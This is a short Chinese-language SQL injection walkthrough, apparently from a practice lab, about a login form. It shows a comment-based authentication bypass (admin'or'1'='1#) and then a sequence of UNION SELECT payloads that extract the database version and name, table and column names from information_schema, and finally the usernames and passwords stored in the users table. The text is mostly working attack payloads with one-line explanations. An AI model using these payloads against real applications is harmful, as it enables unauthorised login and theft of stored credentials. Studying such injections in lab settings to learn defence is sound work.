@$sql="SELECT username,password FROM users WHERE username='admin'or'1'='1# and password='$passwd' LIMIT 0,1";
在 # 以后的内容就被注释掉,前面的内容因为 or 1=1 恒成立,所以语句就成立,我们此时以 admin 的用户登录。那么接下来我们尝试用 get 注入中用到的其他的语句代替 or 1=1 进行注 入。2admin' union select version(),database() #
在 uname ,获取到数据库版本和数据库名2admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #
获取到表2admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
获取到字段名2admin' union select 1,group_concat(username,password) from users #
获取到字段值让时间为你证明